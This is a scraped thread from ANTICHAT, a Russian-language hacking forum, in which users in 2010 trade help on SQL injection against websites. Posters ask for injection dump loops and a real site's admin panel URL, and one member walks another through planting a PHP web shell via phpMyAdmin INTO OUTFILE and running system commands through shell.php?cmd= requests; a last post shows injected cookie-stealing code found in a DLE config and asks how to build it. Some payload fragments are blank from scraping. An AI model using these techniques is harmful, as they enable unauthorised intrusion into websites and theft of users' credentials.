HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #15621  
Старый 15.11.2010, 03:24
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342

Репутация: 165
По умолчанию

Цитата:
Сообщение от MastaBass1  
MastaBass1 said:
Не понимаю, если есть проблема и ты не знаешь как помочь, почему нужно вину валить на другого?
Я по-моему ясно объяснил что мне не нужны программы для дампа, мне просто нужен пример составления цикла вывода инъекции.
А в чём собственно проблема? Бери да пиши на PHP цикл и крути limit
 
Ответить с цитированием

  #15622  
Старый 15.11.2010, 11:25
Unknown
Guest
Сообщений: n/a
Провел на форуме:
34733

Репутация: 83
По умолчанию

Вот скрипт от Dr.Z3r0:

Цитата:
Сообщение от Dr.Z3r0  
Dr.Z3r0 said:
Скрипт для вывода инфы через LIMIT или еще что нибудь этого рода
Код:
Code:
Крутит через лимит запросы.
 
Ответить с цитированием

  #15623  
Старый 15.11.2010, 12:12
freezed
Guest
Сообщений: n/a
Провел на форуме:
31258

Репутация: 7
По умолчанию

Есть инъекция с file_priv:Y, помимо файлов можно читать и директории, но выдает их в слегка нечитаемом виде.

например /:



Есть ли возможность перевести в более читаемый режим и получить хотя бы список файлов/директорий?
 
Ответить с цитированием

  #15624  
Старый 15.11.2010, 12:26
Unknown
Guest
Сообщений: n/a
Провел на форуме:
34733

Репутация: 83
По умолчанию

Цитата:
Сообщение от freezed  
freezed said:
Есть инъекция с file_priv:Y, помимо файлов можно читать и директории, но выдает их в слегка нечитаемом виде.
например /:

Есть ли возможность перевести в более читаемый режим и получить хотя бы список файлов/директорий?
Ссылку дайте, видимо у вас что-то с кодировкой.
 
Ответить с цитированием

  #15625  
Старый 15.11.2010, 12:51
freezed
Guest
Сообщений: n/a
Провел на форуме:
31258

Репутация: 7
По умолчанию

Думаю, что с кодировкой все нормально, так как с чтением файлов проблем нет.
 
Ответить с цитированием

  #15626  
Старый 15.11.2010, 19:26
roddik
Познающий
Регистрация: 14.01.2009
Сообщений: 93
Провел на форуме:
244235

Репутация: 39
По умолчанию

Привет, подскажите плз, где админка в http://www.runiga.ru/ ?
 
Ответить с цитированием

  #15627  
Старый 15.11.2010, 21:13
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684

Репутация: 136
По умолчанию

http://www.runiga.ru/panel/
 
Ответить с цитированием

  #15628  
Старый 16.11.2010, 04:10
GroM88
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186

Репутация: 2
Отправить сообщение для GroM88 с помощью ICQ
По умолчанию

Народ) кто знает почему такие траблы при залитии шелла через phpmyadmin

Вообщем имею доступ к пхпмайадмин под root'om с полными правами.

хочу залить шелл.

Мучу такой запрос:

Цитата:
Сообщение от None  
CREATE TABLE `tableshell` (`shell` TEXT);
Цитата:
Сообщение от None  
INSERT INTRO `tableshell` (`shell`) VALUES ('')
После второго запроса получаю такую ошибку:

Цитата:
Сообщение от None  
#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '`tableshell` (`shell`) VALUES (''' at line 1
Кто знает почему вылазит эта ошибка?

Пробовал другой выриант:

Цитата:
Сообщение от None  
select '' from mysql.user into outfile 'E:/www.site.ru/shell.php'
Создается файл в корневой директории сайта.

Но при запросе http://www.site.ru/shell.php?cmd=dir получаю такую ошибку :

Цитата:
Сообщение от None  
Parse error: syntax error, unexpected $end in E:\www.site.ru\shell.php(1) : eval()'d code on line 1
Что не так делаю? = \
 
Ответить с цитированием

  #15629  
Старый 16.11.2010, 06:04
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию

GroM88


В первом случае у тебя нарушен синтаксис, верный запрос выглядит так:

PHP код:
PHP:
[
COLOR="#000000"]INSERT INTRO `tableshell` (`shell`) VALUES ("[COLOR="#0000BB"][/COLOR]")

[/COLOR
А если учесть, что не на всех серверах включена директива short_open_tag, то так:

PHP код:
PHP:
[
COLOR="#000000"]INSERT INTRO `tableshell` (`shell`) VALUES ("[COLOR="#0000BB"][/COLOR]")

[/COLOR
Не забывай, что при таком методе залития, директива allow_url_include - должна находиться в положении On, иначе шелл не проинклудится.

Во втором случае, нарушен синтаксис и отсутствует логика.

Во первых, после команды нужна точка с запятой, например для вывода phpinfo синтаксически верным был бы такой запрос:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.site.ru/shell.php?cmd=phpinfo();

[/COLOR][/COLOR
Во вторых, если ты собираешься вызывать системные команды, а не просто эвалить php код (команда dir, является системной командой Windows), то нужно использовать соответствующие функции, либо заключать команды в тильды (``), чтобы php понимал, что эту команду нужно выполнить, как команду оболочки.

О функциях исполнения системных команд и их различиях, можешь почитать тут http://www.php.su/functions/?cat=exec

Вывод листинга директорий для Windows систем, c учетом кода, что ты залил, можно получить одним из следующих запросов (если конечно соответствующие функции не отключены на сервере или не включен safe mod):

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.site.ru/shell.php?cmd=echo `dir`;

[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.site.ru/shell.php?cmd=passthru('dir');

[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.site.ru/shell.php?cmd=system('dir');

[/COLOR][/COLOR
 
Ответить с цитированием

  #15630  
Старый 16.11.2010, 12:08
spiderbuber
Guest
Сообщений: n/a
Провел на форуме:
19136

Репутация: 0
По умолчанию

Сегодня залил шел на ДЛЕшный сайт, заглянул в dbconfig.php и увидел, что до меня тут кто-то уже побавал.. В конце конфига прописано:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ((!isset([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'dle_password'[/COLOR][COLOR="#007700"]])) and ([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REMOTE_ADDR'[/COLOR][COLOR="#007700"]]!=[/COLOR][COLOR="#DD0000"]"ИП_ЖЕРТВЫ"[/COLOR][COLOR="#007700"]) ) {

echo

[/COLOR][COLOR="#007700"]HTML;

}[/
COLOR][/COLOR
Я так понимаю, таким образом тырят куки юзеров.. А вот куда это сливается? Как самаму замутить такой слив?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ